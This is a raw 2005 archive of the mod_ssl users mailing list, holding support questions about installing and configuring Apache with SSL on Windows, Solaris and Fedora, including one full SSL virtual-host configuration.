1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 15 03:49:02 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 755E014EAB6; Tue, 15 Mar 2005 03:49:02 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from EXCHANGE.ad.umassp.edu (amhexccls02.ad.umassp.edu [69.16.118.114])
	by master.modssl.org (Postfix) with ESMTP id 1E1E714EAAC
	for ; Tue, 15 Mar 2005 03:49:01 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C52909.8AEAE116"
Subject: mod_ssl for Apache 2.0??
Date: Mon, 14 Mar 2005 21:49:00 -0500
Message-ID: <5290ED5BE539294F9C1534FBC9C28E9D01FAF9A5@EXCHANGE.ad.umassp.edu>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: mod_ssl for Apache 2.0??
Thread-Index: AcUpCYqm15Y9i8ojRQGrAFQ53TEZvw==
From: "Karen Mclaughlin" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Karen Mclaughlin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C52909.8AEAE116
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

I need to install mod_ssl for Apache 2.0 asap (yesterday of course!!)

I am not finding the download for the module for Apache 2.0??

=20

Is it available and from where?

=20

Thanks=20

New to list and I had some trouble with the archive searches so I
appreciate your help!

=20

Karen


------_=_NextPart_001_01C52909.8AEAE116
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
















I need to install mod_ssl for Apache 2.0 asap =
(yesterday of
course!!)



I am not finding the download for the module for =
Apache
2.0??



 



Is it available and from =
where?



 



Thanks 



New to list and I had some trouble with the archive =
searches
so I appreciate your help!



 



Karen









------_=_NextPart_001_01C52909.8AEAE116--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 17 00:53:41 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 39B6E14EAA3; Thu, 17 Mar 2005 00:53:41 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from vsmtp12.tin.it (vsmtp12.tin.it [212.216.176.206])
	by master.modssl.org (Postfix) with ESMTP id 0DBD314EA8E
	for ; Thu, 17 Mar 2005 00:53:34 +0100 (CET)
Received: from LapoACER1511LMI (80.117.196.20) by vsmtp12.tin.it (7.0.027) (authenticated as lapolapolapo@tin.it)
        id 422481CF006CE246 for modssl-users@modssl.org; Thu, 17 Mar 2005 00:53:33 +0100
Message-ID: <008901c52a83$558466f0$0201a8c0@LapoACER1511LMI>
From: "Lapo TIN" 
To: 
Subject: HTTPS and USB TOKEN
Date: Thu, 17 Mar 2005 00:53:15 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0082_01C52A8B.B39FC420"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2527
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2527
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lapo TIN" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0082_01C52A8B.B39FC420
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hello to everybody.
My intent is to have an HTTPS server  that uses an USB token for SSL=20
protocol.
I know it's not possible to have good performances with tokens , but I =
don't=20
care.

I would like that the server uses the private key that is securely =
stored in=20
the token.
And according to the fact that a token cannot allow any method for =
reading=20
that private key, I'm trying to find the best server that can use =
crypting=20
function of a token. Apache modssl is ready for this ?
Do you have an idea on how can I ?

points are:
- which web server
- is there some stuff that already do that ? usb token that provide =
library=20
or server ready for that purpose.. which usb token...

thanks in advance=20

------=_NextPart_000_0082_01C52A8B.B39FC420
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hello to=20
everybody.
My intent is to have an HTTPS server  that uses an =
USB token=20
for SSL 
protocol.
I know it's not possible to have good =
performances with=20
tokens , but I don't 
care.

I would like that the server uses =
the=20
private key that is securely stored in 
the token.
And according =
to the=20
fact that a token cannot allow any method for reading 
that private =
key, I'm=20
trying to find the best server that can use crypting 
function of a =
token.=20
Apache modssl is ready for this ?


Do you have an=20
idea on how can I ?

points are:
- which web server
- is =
there some=20
stuff that already do that ? usb token that provide library 
or =
server ready=20
for that purpose.. which usb token...

thanks in advance=20



------=_NextPart_000_0082_01C52A8B.B39FC420--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 17 09:53:00 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 3FC7814EAB2; Thu, 17 Mar 2005 09:53:00 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from piau.cert-ist.com (piau.cert-ist.com [213.56.132.1])
	by master.modssl.org (Postfix) with ESMTP id 03EF314EA97
	for ; Thu, 17 Mar 2005 09:52:59 +0100 (CET)
Received: by piau.cert-ist.com (Hidden, from userid 1000)
	id 24473D2CDC; Thu, 17 Mar 2005 09:52:59 +0100 (CET)
Received: from cerbere.celsecat.com (cerbere.celsecat.com [192.168.1.30])
	by piau.cert-ist.com (Hidden) with ESMTP id D4774D2CDB
	for ; Thu, 17 Mar 2005 09:52:54 +0100 (CET)
Received: from iena.cert-ist.com (unverified) by cerbere.celsecat.com
 (Clearswift SMTPRS 5.0.4) with ESMTP id  for ;
 Thu, 17 Mar 2005 09:52:44 +0100
Subject: ModSSL custom error messages
From: Stephane Rozes 
To: modssl-users@modssl.org
Content-Type: text/plain
Date: Thu, 17 Mar 2005 09:52:53 +0100
Message-Id: <1111049573.4428.9.camel@localhost.localdomain>
Mime-Version: 1.0
X-Mailer: Evolution 2.0.3 
Content-Transfer-Encoding: 7bit
X-Spam-Checker-Version: SpamAssassin 3.0.2 (2004-11-16) on udala.cert-ist.com
X-Spam-Level: 
X-Spam-Status: No, score=-2.6 required=5.0 tests=BAYES_00 autolearn=ham 
	version=3.0.2
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Stephane Rozes 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi,

I have the following problem with the "modssl" module :

When a user connects with a wrong client certificate or without
certificate, this user gets a "page cannot be displayed message" in his
(IE) browser.

In the ssl logs I get a nice message saying something like "client cert
revoked, not valid or whatever" so the system is working properly.

What I would like to do is to redirect the user to a custom error page
when something like this happens. How can I do that?

I've read that this behaviour can be performed with an "handler" but I'm
looking for a solution less complex.

Thanks,

Stephane R.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 18 15:38:34 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6708A14EAB2; Fri, 18 Mar 2005 15:38:34 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rduex02.corp.stratech.com (outmail.stratech.com [216.26.242.2])
	by master.modssl.org (Postfix) with ESMTP id 0909F14DCA1
	for ; Fri, 18 Mar 2005 15:38:33 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
Subject: Install apache 2.0.53 with mod_ssl openssl 0.9.7 on Solaris 9
Date: Fri, 18 Mar 2005 09:38:30 -0500
Message-ID: 
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Install apache 2.0.53 with mod_ssl openssl 0.9.7 on Solaris 9
thread-index: AcUryCf6wzBdUtN0RiOfFvEQ4dZarg==
From: "Plantier, Spencer" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Plantier, Spencer" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Is there some plain instructions on how to install mod_ssl with apache
2.0.53 and openssl. I am new to solaris and I need to get snort
reporting tools going asap. Any help would be appeciated.

Thanks.=20

Spencer Plantier
System Network Administrator
=20
301 Gregson Dr
Cary, NC  27511
Office 919-379-8513
Cell    919-272-8833
spencer.plantier@stratech.com
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Mar 18 17:21:03 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 01DEE14EAB5; Fri, 18 Mar 2005 17:21:03 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from warthog.se (mail.warthog.se [212.247.84.253])
	by master.modssl.org (Postfix) with ESMTP id AE24714DCA1
	for ; Fri, 18 Mar 2005 17:21:01 +0100 (CET)
Received: from p416002 [192.168.1.20]
	by warthog.se [127.0.0.1]
	with SMTP (MDaemon.PRO.v4.0.5.R)
	for ; Fri, 18 Mar 2005 17:19:23 +0100
Message-ID: <002501c52bd6$3fe846f0$1401a8c0@p416002>
From: "Daniel Kimblad" 
To: "modssl-users" 
Subject: Apache2 refuses to start with "SSLEngine on"
Date: Fri, 18 Mar 2005 17:19:24 +0100
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0022_01C52BDE.A17F8470"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-MDRemoteIP: 192.168.1.20
X-Return-Path: daniel.kimblad@gizmondostudios.se
X-MDaemon-Deliver-To: modssl-users@modssl.org
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Daniel Kimblad" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0022_01C52BDE.A17F8470
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Windows 2000 SP4
Apache 2.0.53
mod_ssl 2.0.53
OpenSSL 0.9.7e
PHP 4.3.10

I'm trying to set up SSL on a Windows 2000 server. Everything was =
working fine until I turned SSL on with "SSLEngine on". Then Apache =
wouldn't even start anymore, no error-messages. In a command-prompt =
environment Apache seems to start as it leaves no messages what so ever. =
However, it doesn't. But that's not all.

I have everything set up on my workstation working perfectly. I've added =
a fake-domain in "c:\winnt\system32\drivers\etc\hosts" with the line =
"127.0.0.1  www.mydomain.com".
This way I can access the VirtualHost via it's domain-name locally and =
it works like a charm.
Certificates and encryption and most everything I've tried works on the =
workstation but not the server. There Apache won't even start with SSL =
enabled.

Here follows my SSL/VirtualHost configuration:
-------------------------------------------------------------------------=
-----------------------
Listen 443

SSLRandomSeed startup builtin
SSLRandomSeed connect builtin

AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl

SSLPassPhraseDialog  builtin
SSLSessionCache         dbm:logs/ssl_scache
SSLSessionCacheTimeout  300

SSLMutex  none


    ServerName www.mydomain.com
    DocumentRoot "c:/program files/apache group/apache2-ssl/htdocs"
   =20
    SSLEngine on
    SSLCipherSuite HIGH:MEDIUM
    SSLProtocol all -SSLv2
   =20
    SSLCertificateFile conf/ssl.crt/www.mydomain.com.crt
    SSLCertificateKeyFile conf/ssl.key/www.mydomain.com.key
   =20
    SSLCACertificatePath conf/ssl.crt
    SSLCACertificateFile conf/ssl.crt/MyOwnCA.crt
   =20
    SSLVerifyClient require
    SSLVerifyDepth  2
   =20
    SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

-------------------------------------------------------------------------=
-----------------------

If I remove "SSLEngine on" everything works like a charm, Apache starts =
and serves pages on port 443 with PHP working. Though with a warning in =
the error-log:

    [warn] Init: (www.mydomain.com:443) You configured HTTP(80) on the =
standard HTTPS(443) port!

I've been trying to figure this out for 3 days but I'm running out of =
ideas. Trying to start Apache from the ApacheMonitor results in the =
message "The requested operation has failed!". That's as detailed as it =
gets.

The files libeay32.dll, ssleay32.dll exist both in Apache's bin =
directory and in the c:\winnt\system32 directory. openssl.exe exists in =
Apache's bin dir.
I've tried installing OpenSSL using the Shining Light Productions =
installer but no luck so far (I haven't restarted the server though).

Any ideas or pointers would be greatly appreciated.

kind regards
/Daniel
------=_NextPart_000_0022_01C52BDE.A17F8470
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Windows 2000 SP4


Apache 2.0.53


mod_ssl 2.0.53


OpenSSL 0.9.7e


PHP 4.3.10


 


I'm trying to set up SSL on a Windows =
2000 server.=20
Everything was working fine until I turned SSL on with "SSLEngine on". =
Then=20
Apache wouldn't even start anymore, no error-messages. In a =
command-prompt=20
environment Apache seems to start as it leaves no messages what so ever. =

However, it doesn't. But that's not all.


 


I have everything set up on my =
workstation working=20
perfectly. I've added a fake-domain in =
"c:\winnt\system32\drivers\etc\hosts"=20
with the line "127.0.0.1  www.mydomain.com".


This way I can access the VirtualHost =
via it's=20
domain-name locally and it works like a charm.


Certificates and encryption and most =
everything=20
I've tried works on the workstation but not the server. There Apache =
won't even=20
start with SSL enabled.


 


Here follows my SSL/VirtualHost=20
configuration:


----------------------------------------------------------------=
--------------------------------


Listen 443


 


SSLRandomSeed startup =
builtin
SSLRandomSeed=20
connect builtin


 


AddType application/x-x509-ca-cert =
.crt
AddType=20
application/x-pkcs7-crl    .crl


 


SSLPassPhraseDialog =20
builtin
SSLSessionCache        =
;=20
dbm:logs/ssl_scache
SSLSessionCacheTimeout  300


 


SSLMutex  none



<VirtualHost www.mydomain.com:443>
  &n=
bsp;=20
ServerName www.mydomain.com
    DocumentRoot =
"c:/program=20
files/apache group/apache2-ssl/htdocs"
   =20

    SSLEngine on
   =20
SSLCipherSuite HIGH:MEDIUM
    SSLProtocol all=20
-SSLv2
    
   =20
SSLCertificateFile conf/ssl.crt/www.mydomain.com.crt
  =
 =20
SSLCertificateKeyFile conf/ssl.key/www.mydomain.com.key
 &nb=
sp; =20

   =20
SSLCACertificatePath conf/ssl.crt
   =20
SSLCACertificateFile conf/ssl.crt/MyOwnCA.crt
    =


    SSLVerifyClient require
   =20
SSLVerifyDepth  2
    
    =

SetEnvIf User-Agent ".*MSIE.*"=20
\
         nokeepalive=20
ssl-unclean-shutdown =
\
        =20
downgrade-1.0 force-response-1.0
</VirtualHost>


--------------------------------------------------------------------=
----------------------------


 


If I remove "SSLEngine on" everything works like a charm, Apache =
starts and=20
serves pages on port 443 with PHP working. Though with a warning in the=20
error-log:


 


    [warn] Init: (www.mydomain.com:443) You =
configured=20
HTTP(80) on the standard HTTPS(443) port!


 


I've been trying to figure this out for 3 days but I'm running out =
of=20
ideas. Trying to start Apache from the ApacheMonitor results in the =
message "The=20
requested operation has failed!". That's as detailed as it gets.


 


The files libeay32.dll, ssleay32.dll exist both in Apache's bin =
directory=20
and in the c:\winnt\system32 directory. openssl.exe exists in Apache's =
bin=20
dir.


I've tried installing OpenSSL using the Shining Light=20
Productions installer but no luck so far (I haven't restarted the =
server=20
though).


 


Any ideas or pointers would be greatly appreciated.


 


kind regards


/Daniel


------=_NextPart_000_0022_01C52BDE.A17F8470--


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 21 12:35:29 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0C29414EAB7; Mon, 21 Mar 2005 12:35:29 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51504.mail.yahoo.com (web51504.mail.yahoo.com [206.190.38.196])
	by master.modssl.org (Postfix) with SMTP id 76EDD14EA91
	for ; Mon, 21 Mar 2005 12:35:27 +0100 (CET)
Received: (qmail 7535 invoked by uid 60001); 21 Mar 2005 11:35:16 -0000
Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  b=wztARluwKjMn64y/EUrvQGU4cSfTYFxyvNMw3+wfD6cA5zQaiVkskn+VcKKiybCocB45MFRttAz06uNWz1NGUIb7n3SvD/lW3VO21+w4wpZgCMK2q5+7E0cCSFo/hlm7Jdke4/bIExa9ECeG5P18Im47LS9LGOmMi336OPoGKjc=  ;
Message-ID: <20050321113516.7533.qmail@web51504.mail.yahoo.com>
Received: from [128.107.253.39] by web51504.mail.yahoo.com via HTTP; Mon, 21 Mar 2005 03:35:16 PST
Date: Mon, 21 Mar 2005 03:35:16 -0800 (PST)
From: Alaka Pathy 
Subject: ModSSL 2.8.17 on Solaris 10 -Any known issues ?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alaka Pathy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,

I'm using modssl 2.8.17 binaries on Solaris 10
platform. From the sanity testing it seems to be
working on Solaris 10.

Is anybody aware of modSSL officially supporting
Solaris 10 ? Also can you please share your
experience, if anyone of you had come across any
issues with modSSL binaries on Solaris 10.

Thanks in advance,
-Alaka

__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Mar 21 13:03:43 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 396E614EAB5; Mon, 21 Mar 2005 13:03:43 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from web51505.mail.yahoo.com (web51505.mail.yahoo.com [206.190.38.197])
	by master.modssl.org (Postfix) with SMTP id A6E1914EA8F
	for ; Mon, 21 Mar 2005 13:03:41 +0100 (CET)
Received: (qmail 47468 invoked by uid 60001); 21 Mar 2005 12:03:41 -0000
Comment: DomainKeys? See http://antispam.yahoo.com/domainkeys
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
  s=s1024; d=yahoo.com;
  b=E59lOVaBI447ycwUu3W41a88IhwVup2eKf9bGQQbI9f9NLx7th0lMxcDWSKAWAl/Jtyye8cLEqd+Lrn9NYkmV3c+7aAhS+liu/+565omfnNxnefdL4ZFvKP9X9qBOmf5Q74RbPg3OfCClTpc/HqmyildkKNbt0t1TQLdaMK4dh4=  ;
Message-ID: <20050321120341.47466.qmail@web51505.mail.yahoo.com>
Received: from [128.107.253.39] by web51505.mail.yahoo.com via HTTP; Mon, 21 Mar 2005 04:03:40 PST
Date: Mon, 21 Mar 2005 04:03:40 -0800 (PST)
From: Alaka Pathy 
Subject: ModSSL 2.8.17 on Solaris 10 -Any known issues ?
To: modssl-users@modssl.org
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Alaka Pathy 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi All,

I'm using ModSSL 2.8.17 binaries on Solaris 10
platform. From the sanity testing it seems to be
working on Solaris 10.

Is anybody aware of ModSSL officially supporting
Solaris 10 ? Also can you please share your
experience, if anyone of you had come across any
issues with ModSSL 2.8.17 binaries on Solaris 10.

Thanks in advance,
-Alaka


		
__________________________________ 
Do you Yahoo!? 
Yahoo! Mail - Helps protect you from nasty viruses. 
http://promotions.yahoo.com/new_mail
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 22 17:55:47 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CF42214EAA5; Tue, 22 Mar 2005 17:55:47 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mailhub2.qub.ac.uk (jeremiah.qub.ac.uk [143.117.14.19])
	by master.modssl.org (Postfix) with ESMTP id A055414EA96
	for ; Tue, 22 Mar 2005 17:55:47 +0100 (CET)
Received: from smtp2.qub.ac.uk ([143.117.143.72] helo=smtp.qub.ac.uk)
	by mailhub2.qub.ac.uk with esmtp (Exim 4.20)
	id 1DDmfS-0001L8-Ro
	for modssl-users@modssl.org; Tue, 22 Mar 2005 16:55:46 +0000
Received: from a9015.cc.qub.ac.uk ([143.117.9.15])
	by smtp.qub.ac.uk with esmtp (Exim 4.42)
	id 1DDmfR-0005wF-06
	for modssl-users@modssl.org; Tue, 22 Mar 2005 16:55:45 +0000
Message-ID: <42404E13.3060302@qub.ac.uk>
Date: Tue, 22 Mar 2005 16:55:47 +0000
From: Ronan McGlue 
User-Agent: Mozilla Thunderbird 1.0 (X11/20041206)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: RE: solaris 9 w/ mod_ssl + apache 1.3.33
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ronan McGlue 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

regarding
Solaris 9 / modssl-2.8.22-1.3.33 problems [message #540974] 	Fr, 17 
Dezember 2004 01:59
Steve Parker

I am having the same trouble but his solution does not work for me...
Is there a new solution that hasn't made it onto the list archives? or 
can steve get in touch and explain to me exactly how he succeeded.
thanks

ronan
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Mar 23 12:24:55 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0B77C14EAA5; Wed, 23 Mar 2005 12:24:55 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.el.net (mail.el.net [68.165.89.90])
	by master.modssl.org (Postfix) with ESMTP id 59F6714DCB9
	for ; Wed, 23 Mar 2005 12:24:53 +0100 (CET)
Received: (qmail 17554 invoked by uid 1008); 23 Mar 2005 11:24:21 -0000
Received: from unknown (HELO mail.el.net) (127.0.0.1)
  by mail.el.net with SMTP; 23 Mar 2005 11:24:21 -0000
Received: from 24.90.34.93
        (SquirrelMail authenticated user kalin@el.net);
        by mail.el.net with HTTP;
        Wed, 23 Mar 2005 06:24:21 -0500 (EST)
Message-ID: <61073.24.90.34.93.1111577061.squirrel@24.90.34.93>
Date: Wed, 23 Mar 2005 06:24:21 -0500 (EST)
Subject: mod_ssl problem on fedora 
From: "kalin mintchev" 
To: modssl-users@modssl.org
User-Agent: SquirrelMail/1.4.3a
X-Mailer: SquirrelMail/1.4.3a
MIME-Version: 1.0
Content-Type: text/plain;charset=iso-8859-1
Content-Transfer-Encoding: 8bit
X-Priority: 3 (Normal)
Importance: Normal
References: 
In-Reply-To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "kalin mintchev" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

hi...

i need some help with a problem on fedora core 2.

i have 2 machines running the same version of apache with ssl configured
identically - checked the configuration a few times - one is freebsd the
other is fedora core 2.

if i start the apache with ssl on fedora core i get:
"[crit] (98)Address already in use: make_sock: could not bind to address"
in the log..

if i start the server without the ssl it starts up fine?!

the same configuration on the freebsd with the same apache version starts
with no problem with ssl.

there is nothing running on port 80 at the time i start apache on the
fedora machine.

relevant conf information which is identical on both machines:

Listen x.x.x.x:80
NameVirtualHost x.x.x.x:80

this is virtual host for SSL:



and for any other virtual host:



i tried different virtual host names - same over and over again.
is this a fedora problem?

thanks...







-- 




______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 24 19:55:12 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AF70614EAD0; Thu, 24 Mar 2005 19:55:12 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from rwcrmhc12.comcast.net (rwcrmhc12.comcast.net [216.148.227.85])
	by master.modssl.org (Postfix) with ESMTP id 3046914EA9F
	for ; Thu, 24 Mar 2005 19:55:11 +0100 (CET)
Received: from harpo (pcp973891pcs.lwrnce01.in.comcast.net[68.58.76.90])
          by comcast.net (rwcrmhc12) with SMTP
          id <2005032418550901400se3k5e>; Thu, 24 Mar 2005 18:55:09 +0000
Message-ID: <011001c530a3$005ffba0$0a01a8c0@harpo>
From: "Jonathan Mangin" 
To: 
Subject: Is this the correct list?
Date: Thu, 24 Mar 2005 13:55:08 -0500
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2900.2180
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jonathan Mangin" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

I subscribed a few days ago and haven't seen any traffic.

I'm confused about (alot of things) different Apache/SSL versions.
Is this where I can address questions about 2.0.48/ssl
configuration/implementation problems?

--Jon

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Mar 24 21:00:30 2005
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5D77814EAAE; Thu, 24 Mar 2005 21:00:30 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from usmail01.exlibris-int.us (usmail01.exlibris-usa.com [12.47.25.145])
	by master.modssl.org (Postfix) with ESMTP id F03F714DCE6
	for ; Thu, 24 Mar 2005 21:00:29 +0100 (CET)
X-MimeOLE: Produced By Microsoft Exchange V6.0.6487.1
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="Windows-1252"
Content-Transfer-Encoding: quoted-printable
Subject: Undeliverable:Question about Configure SSL server on Solaris 8
Date: Thu, 24 Mar 2005 13:55:35 -0600
Message-ID: <2E22100107E0304CA05E870FB3A26CF7743B43@usmail01>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Undeliverable:Question about Configure SSL server on Solaris 8
Thread-Index: AcUwq3HCyAbHL/5eRfaW40VZGnNnHA==
X-Priority: 5
Importance: low
From: "Huimin Guo" 
To: 
Cc: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Huimin Guo" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I am configuring SSL server on Solaris 8. We use Apache 2. The http
server works fine. I try to configure the https server. The virtual host
for https is defined as



Listen 3051
AddType application/x-x509-ca-cert .crt
AddType application/x-pkcs7-crl    .crl
SSLPassPhraseDialog  builtin
SSLSessionCache         =
